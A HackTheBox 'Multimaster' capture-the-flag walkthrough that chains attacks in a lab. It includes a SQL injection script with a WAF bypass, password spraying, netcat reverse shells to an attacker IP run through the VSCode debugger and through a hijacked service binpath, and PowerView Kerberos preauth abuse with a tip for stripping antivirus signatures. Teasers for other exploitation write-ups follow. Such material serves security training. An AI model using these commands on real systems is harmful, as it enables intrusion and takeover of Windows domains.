Try   HackMD

HackTheBox - Multimaster

Foothold

Webserver with /api/getColleagues

SQL Injection with a WAF Bypass

User

Simple Data Exfil

http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

union injection to exfiltrate data

escaped unicode characters -> Bypass the waf
enumerate database -> find table Logins with usernames and hashes

  • crack hashes and save passwords for later

Cracking the hashes

Enumerate Domain Users via RID

































































#!/bin/bash

function get_output {
  out=$(curl -X POST http://10.10.10.179/api/getColleagues -d "{\"name\":\"${1}\"}" -H "Content-Type: application/json" -s)
  resp=$(echo $out | cut -d '"' -f18)
  echo $resp
}

# TODO more enum scripts

# TODO

function dump_tables {

}

# TODO
function dump_hashes {

}

function find_domain {
  payload="-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --"
  enc_payload=$(python charunicodeescape.py "$payload")
  get_output $enc_payload
}

# Enumerates MSSQL Users by ID
function find_by_id {
  for id in {1..300}; do
    payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_NAME($id); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    resp=$(get_output $enc_payload)
    [ ! -z "$resp" ] && echo ID=$id USER=$resp
    sleep 2
  done
}

function get_sid {
  payload="-1' UNION ALL SELECT 1,2,3,4,CONVERT(char(100),SUSER_SID('MEGACORP\Domain Users'),1); --"
  enc_payload=$(python charunicodeescape.py "$payload")
  get_output $enc_payload
}

# Enumerates Domain Users by SID
function find_by_sid {
  sid=$(get_sid | head -c-9)
  for x in {500..1500}; do
    v=$(printf "%08x\n" $x | tr a-z A-Z) # print as hex and pad with 8 zeros
    hex=${v:6:2}${v:4:2}${v:2:2}${v:0:2} # convert to little endian
    payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_SNAME($sid$hex); --"
    enc_payload=$(python charunicodeescape.py "$payload")
    user=$(get_output $enc_payload)
    [ ! -z "$user" ] && echo ID=$hex USER=$user
    sleep 2
  done
}

echo "######## MSSQL Domain Enumeration ########"
echo ""
echo "Domain: "$(find_domain)
#find_by_id
#get_sid
find_by_sid

Password Spraying

bruteforce login via smb with found users and previously cracked passwords

login with evil-winrm

tushikikatomo -> cyork

netstat -a to identify ports listening on 127.0.0.1
ps | Select-String "Code"

VSCode is being run in intervals, we also notice the listening ports are changing and only open when VSCode is running
Electron CEFDebugger listening (NodeJS)

https://github.com/taviso/cefdebug

we can abuse it with this tool called cefdebug

cefdebug.exe # identify correct url
cefdebug.exe --code "process.mainModule.require('child_process').exec('C:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.17 1338')" --url ws://127.0.0.1/{<some-uuid>}

cyork -> sbauer

net user cyork

-> Member of the Developers Group
we can read the C:\inetpub\wwwroot Directory
somewhere inside we find MultimasterAPI.dll and MultimasterAPI.pdb

easily decompile it with dnSpy or similar tools

find credentials for the MSSQL User finder

Password Spraying (again)

another bruteforce attack with this password on all domain users (patator smb_login)

we can login as sbauer, also part of Remote Management -> evil-winrm

sbauer -> jorden

run sharphound

-> GenericWrite privileges on jorden
   # Command to Get rid of comments and possible AV Signatures
   # sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1
   # Credit: https://implicitdeny.org/2016/03/powerview-caught-by-sep/
-> use PowerView.ps1 to abuse them in the following way:

*Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden))))
Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden'
*Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue

Name                           Value
----                           -----
NORMAL_ACCOUNT                 512
DONT_EXPIRE_PASSWORD           65536
DONT_REQ_PREAUTH               4194304

Privesc to System

jorden is Member of Server Operator group

We have permissions to modify,start & stop some services

Find services that are started in the context of LocalSystem

reg query HKLM\System\CurrentControlSet\Services /f LocalSystem /t REG_SZ /s

pick one and hope for the best

*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc config wisvc binpath= "%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc start wiSvc

PROFIT!!!

[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\jorden\Documents>

Shell as NT Authority/System

gg

tags: CTF HTB Windows
Last changed by 
imth
just your friendly neighbourhood hacker Twitter: @imthoe
0
764

Read more

SROP - Sigreturn Oriented Programming

A few months ago a colleague of mine created a simple buffer overflow challenge to teach others how to defeat ASLR. The program itself was written in assembly and only consisted of 3 syscalls more or less &#x2013; read, write and exit. The overflow was easy, there was no boundary check or anything and you could simply write data to the stack. Since the purpose of the challenge was to defeat only ASLR, NX was disabled. The intended solution was to leak a stack address via the write syscall, write some shellcode to the stack, calculate the offset with the leaked address and jump to it. When I started working on the challenge it never occurred to me that I could use a write syscall to leak an address. That&apos;s when I dug down the rabbit hole. After some researching I stumpled upon a technique that I had not heard of before: SROP. Spoiler Alert, I didn&apos;t solve the challenge with SROP because I was only able to read 58 bytes. I&apos;ll explain in a moment why that&apos;s important. I was intrigued either way and started learning about it. SROP stands for Sigreturn Oriented Programming and unlike Return Oriented Programming only requires 2 Gadgets, the ability to write 300 bytes to the stack and the ability to control the Instruction Pointer. The required gadgets are a sigreturn and a syscall return gadget. In older Linux Kernels these are often already available at a fixed address. A sigreturn is used to return from the signal handler and to clean up the stack frame after a signal has been unblocked. And &quot;cleaning up the stack frame&quot; really means it&apos;s restoring important context data that has been saved on the stack temporarily. This data includes values of all registers and some things that are unrelevant for exploitation, which is also the reason why at least 300 bytes are required for it to work. I won&apos;t go into detail about the context struct that is used to store this data. The python library pwntools already provides an easy method to forge these structs. This will allow us to control all registers with only a single gadget. Once these requirements are met it&apos;s possible to do basically anything. In my exploit I will use mprotect to make a memory segment with a fixed address writable and executable, shift the stack to this address space,write some shellcode on the stack and execute it by returning to it.

Oct 10, 2021
HackTheBox - Intense

Enumeration Nmap: # Nmap 7.80 scan initiated Sat Jul 11 17:54:15 2020 as: nmap -sC -sV -oN nmap 10.10.10.195 Nmap scan report for 10.10.10.195 Host is up (0.043s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:

Apr 9, 2021
HackTheBox - Antidote

Introduction With this writeup I want to give a brief introduction into ARM exploitation and explain some of the differences compared to x86 aswell as common pitfalls or things to look out for. It was one of the first ARM challenges I&apos;ve solved all by myself so I&apos;ll try to explain my thought process and approach. Let&apos;s get into it! The challenge is a simple buffer overflow on a 32-bit ARM processor architecture. We are provided both the challenge exectuable and the libc shared library, which is a huge help in calculating offsets. pi@raspberrypi:~/Antidote $ file antidote antidote: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 2.6.16, not stripped

Feb 21, 2021
HackTheBox - Console

Googling leads us to this plugin: https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef Looking at the requests and code we can confirm it is using that plugin. The plugin uses multiple sha256 sums of the password for authentication. Source Code: https://github.com/barbushin/php-console We can simply copy the &quot;publickey&quot;, it&apos;s just a hash of the IP and basic UID. For Simplicity&apos;s sake we just copy it. There is a field in the response headers isSuccess telling us if we successfully authenticated or not. I created a bruteforcing script that can be found below.

Jul 15, 2020
Read more from imth
Published on HackMD